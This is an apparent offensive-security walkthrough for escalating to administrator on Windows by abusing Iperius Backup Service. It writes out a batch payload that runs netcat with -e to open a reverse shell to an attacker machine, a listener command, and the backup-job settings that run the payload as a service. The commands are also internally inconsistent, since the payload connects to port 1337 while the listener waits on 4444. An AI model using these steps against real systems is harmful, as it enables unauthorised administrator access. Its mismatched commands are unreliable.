Iperius Backup Service Privilege Escalation
Last modified: 2023-02-08
Iperius Backup Service is a database backup software. It is vulnerable to privilege escalation in Windows.
First check if Iperius is running in target machine.
wmic service list | findstr "Iperius"
If the Iperius service is running, we can gain access to administrator privilege.
In target machine, create a .bat file named "exploit.bat".
@echo off C:\Users\<USERNAME>\Downloads\nc.exe <attack_machine_ip> 1337 -e exploit.exe
Then place it to Desktop.
When saving, be sure to save it as the file type "All Files" (NOT .txt).
After that start a listener in local machine.
nc -lvnp 4444
- Click "Iperius" icon in Windows Explorer (the common path is C:\Program Files (x86)\Iperius Backup\Iperius).
- Right click the "Iperius" icon on the right-bottom of the bar to open it.
- Click "Create New Backup" and select "Add Folder".
- Enter path (c:\Users\<USERNAME>\Documents) and click "OK".
- Navigate to "Destination" tab and select "Add Destination Folder".
- Enter path (c:\Users\<USERNAME>\Descktop) and click "OK".
- Navigate to "Other Processes" tab.
- On "Before backup" section, check "Run a program or open external file:" and select "exploit.bat" file.
After setting a new backup, we can run it.
On "Iperius Backup" window, right-click on backup jobs "Documents" and select "Run backup as service" then click "OK" on the dialog.
Now we should get a shell in local machine.